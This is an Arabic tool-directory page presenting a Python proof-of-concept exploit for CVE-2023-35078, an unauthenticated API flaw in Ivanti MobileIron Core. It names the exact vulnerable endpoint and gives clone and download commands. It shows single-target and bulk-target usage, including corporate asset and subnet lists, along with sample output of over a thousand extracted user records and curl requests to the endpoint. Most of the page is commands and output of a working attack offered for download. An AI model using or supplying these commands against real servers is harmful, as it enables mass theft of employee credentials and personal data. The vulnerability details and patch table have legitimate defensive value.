Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-35078 — CVE-2023-35078 - أداة استغلال وصول غير مصرح به لواجهة برمجة التطبيقات عن بُعد لـ Ivanti MobileIron Core | Kitploit
أدوات/GitHubGitHub/0nsec/cve-2023-35078
الاستطلاعتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراق
GitHub0nsec/cve-2023-35078

CVE-2023-35078

CVE-2023-35078 - أداة استغلال وصول غير مصرح به لواجهة برمجة التطبيقات عن بُعد لـ Ivanti MobileIron Core

عرض المستودع
1منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

أداة استغلال CVE-2023-35078

root@kitploit:~
██████╗ ███╗   ██╗███████╗███████╗ ██████╗
██╔═████╗████╗  ██║██╔════╝██╔════╝██╔════╝
██║██╔██║██╔██╗ ██║███████╗█████╗  ██║     
████╔╝██║██║╚██╗██║╚════██║██╔══╝  ██║     
╚██████╔╝██║ ╚████║███████║███████╗╚██████╗
 ╚═════╝ ╚═╝  ╚═══╝╚══════╝╚══════╝ ╚═════╝

[+] CVE-2023-35078 - وصول غير مصادق إليه API عن بُعد في Ivanti MobileIron Core

Python Version License CVSS Last Updated

أداة إثبات مفهوم مبنية على بايثون لاستغلال CVE-2023-35078، والتي تستهدف ثغرة الوصول غير المصادق إليه API عن بُعد في أنظمة Ivanti MobileIron Core.

نظرة عامة على الثغرة

CVE-2023-35078 هي ثغرة خطيرة تؤثر على Ivanti MobileIron Core تسمح للمهاجمين غير المصادقين عن بُعد بالوصول إلى نقاط API حساسة واستخراج بيانات المستخدمين دون أي مصادقة.

  • درجة CVSS: 9.8 (حرجة)
  • CWE: CWE-306 (فقدان المصادقة للوظائف الحرجة)
  • المنتجات المتأثرة: Ivanti MobileIron Core
  • الإصدارات المعرضة للخطر:
    • 11.2 (قبل CU21)
    • 11.3 (قبل CU18)
    • 11.4 (قبل CU8)
  • متجه الهجوم: الشبكة
  • المصادقة: غير مطلوبة
  • تفاعل المستخدم: غير مطلوب
  • التأثير: كشف كامل لبيانات المستخدمين

تفاصيل تقنية

توجد الثغرة في آلية مصادقة API لـ MobileIron Core، تحديدًا في النقطة النهائية /mifs/aad/api/v2/authorized/users. تفشل النقطة النهائية في التحقق بشكل صحيح من رموز المصادقة، مما يسمح بالوصول غير المصرح به إلى معلومات حساسة للمستخدمين تشمل:

  • بيانات اعتماد المستخدمين: أسماء المستخدمين، تجزئات كلمات المرور
  • بيانات شخصية: الأسماء الكاملة، عناوين البريد الإلكتروني، أرقام الهواتف
  • بيانات الشركة: معرفات الموظفين، معلومات القسم
  • معلومات الأجهزة: الأجهزة المسجلة، تكوينات الأجهزة
  • بيانات إدارية: أدوار المستخدمين، الصلاحيات، عضوية المجموعات

التثبيت

المتطلبات الأساسية

  • Python: 3.6 أو أحدث
  • نظام التشغيل: Linux, macOS, Windows
  • الوصول إلى الشبكة: مطلوب لاختبار الهدف
  • الأذونات: التصريح من مالكي النظام

التثبيت السريع

root@kitploit:~
# استنساخ المستودع
git clone https://github.com/0nsec/cve-2023-35078-exploit.git
cd cve-2023-35078-exploit

# تثبيت التبعيات
pip3 install -r requirements.txt

# جعل الملف قابلاً للتنفيذ (Linux/macOS)
chmod +x cve_2023_35078.py

التثبيت اليدوي

root@kitploit:~
# إنشاء دليل المشروع
mkdir cve-2023-35078-exploit
cd cve-2023-35078-exploit

# تنزيل السكريبت
wget https://raw.githubusercontent.com/0nsec/cve-2023-35078-exploit/main/cve_2023_35078.py

# تثبيت الحزم المطلوبة
pip3 install requests urllib3 termcolor argparse

التثبيت عبر Docker (اختياري)

root@kitploit:~
FROM python:3.9-slim

WORKDIR /app
COPY requirements.txt .
RUN pip install -r requirements.txt

COPY cve_2023_35078.py .
ENTRYPOINT ["python3", "cve_2023_35078.py"]
root@kitploit:~
# بناء وتشغيل مع Docker
docker build -t cve-2023-35078 .
docker run -v $(pwd)/results:/app/results cve-2023-35078 -u https://target.com

الاستخدام

الاستخدام الأساسي

root@kitploit:~
# اختبار هدف واحد
python3 cve_2023_35078.py -u https://mobileiron.example.com

# اختبار أهداف متعددة من ملف
python3 cve_2023_35078.py -f targets.txt

# وضع مفصل مع دليل مخرجات مخصص
python3 cve_2023_35078.py -f targets.txt -o ./results -v

# إعدادات مهلة ومخرجات مخصصة
python3 cve_2023_35078.py -u https://target.com -t 30 -o ./scan_results -v

أمثلة استخدام متقدمة

root@kitploit:~
# تقييم شامل للمؤسسة
python3 cve_2023_35078.py -f corporate_assets.txt -o ./audit_results -t 30 -v

# هدف واحد مع تسجيل مفصّل
python3 cve_2023_35078.py -u https://mobileiron.target.com -v > detailed_log.txt

# مسح دفعات مع مهلة مخصصة
python3 cve_2023_35078.py -f subnet_scan.txt -t 5 -o ./batch_results

# فحص سريع للثغرة (بدون مخرجات مفصلة)
python3 cve_2023_35078.py -u https://quick.check.com -t 5

المخرجات

root@kitploit:~
██████╗ ███╗   ██╗███████╗███████╗ ██████╗
██╔═████╗████╗  ██║██╔════╝██╔════╝██╔════╝
██║██╔██║██╔██╗ ██║███████╗█████╗  ██║     
████╔╝██║██║╚██╗██║╚════██║██╔══╝  ██║     
╚██████╔╝██║ ╚████║███████║███████╗╚██████╗
 ╚═════╝ ╚═╝  ╚═══╝╚══════╝╚══════╝ ╚═════╝

[*] الهدف: https://vulnerable.mobileiron.com
------------------------------------------------------------
[*] التحقق من الإصدار لـ: https://vulnerable.mobileiron.com
[*] تم الكشف عن الإصدار: 11.3
[+] الهدف يبدو معرضًا للخطر!
[*] محاولة استغلال: https://vulnerable.mobileiron.com
[*] محاولة النقطة النهائية: /mifs/aad/api/v2/authorized/users?adminDeviceSpaceId=1
[+] نجاح! تم العثور على 1,247 مستخدمًا
[+] تم حفظ النتائج في: ./results/vulnerable_mobileiron_com_20250821_055013.json
[+] تم استخراج 1247 سجل مستخدم
[*] حقول نموذجية: ['id', 'username', 'email', 'firstName', 'lastName']...

============================================================
[*] اكتمل الفحص!
[*] الأهداف التي تمت معالجتها: 1
[*] عمليات الاستغلال الناجحة: 1
[!] تحذير: تم العثور على نظام (أنظمة) معرضة للخطر!
[!] تأكد من الحصول على التصريح المناسب قبل الاختبار!

المخرجات المفصلة

root@kitploit:~
[*] التحقق من الإصدار لـ: https://test.mobileiron.com
[*] محاولة النقطة النهائية: /mifs/aad/api/v2/authorized/users?adminDeviceSpaceId=1
[*] HTTP 200 - طول الاستجابة: 45,123 بايت
[*] تحليل JSON بنجاح
[*] تم العثور على هيكل بيانات المستخدم مع 234 سجلًا
[+] نجاح! تم العثور على 234 مستخدمًا
[*] بيانات مستخدم نموذجية: {'id': '12345', 'username': '[email protected]'}
[+] تم حفظ النتائج في: ./results/test_mobileiron_com_20250821_055013.json

تحسينات الأداء

  • تجميع الاتصالات: يعيد استخدام اتصالات HTTP
  • الطلبات المتزامنة: معالجة متوازية لأهداف متعددة
  • مهلات ذكية: مهلة تكيفية بناءً على أوقات الاستجابة
  • إدارة الذاكرة: معالجة فعالة لمجموعات البيانات الكبيرة
  • تحديد المعدل: تأخيرات مدمجة لتجنب إغراق الأهداف

معلومات التصحيح من البائع

التحقق من التصحيح

root@kitploit:~
# التحقق من الإصدار الحالي
curl -k https://mobileiron-server/mifs/css/ui.login.css | grep -o "11\.[0-9]"

# التحقق من أن النقاط النهائية المصححة ترجع 401/403
curl -k "https://mobileiron-server/mifs/aad/api/v2/authorized/users?adminDeviceSpaceId=1"

المراجع والمصادر

النشرات الأمنية الرسمية

  • NVD - CVE-2023-35078
  • نشرة أمان Ivanti
  • قائمة الثغرات المستغلة المعروفة من CISA

الوثائق الفنية

  • دليل إدارة Ivanti MobileIron Core
  • توثيق API
  • دليل تعزيز الأمان

الأوراق البحثية والتحليلات

  • تحليل فني مفصّل
  • تقنيات الاستغلال
  • تقرير استخبارات التهديدات
تنزيل الأداة
الإصدارمعرض للخطرالتصحيح متوفرمستوى التصحيحتاريخ الإصدار
11.2.xنعممتوفرCU21+2023-07-25
11.3.xنعممتوفرCU18+2023-07-25
11.4.xنعممتوفرCU8+2023-07-25
11.5.x+لاغير متاحغير متاحغير متاح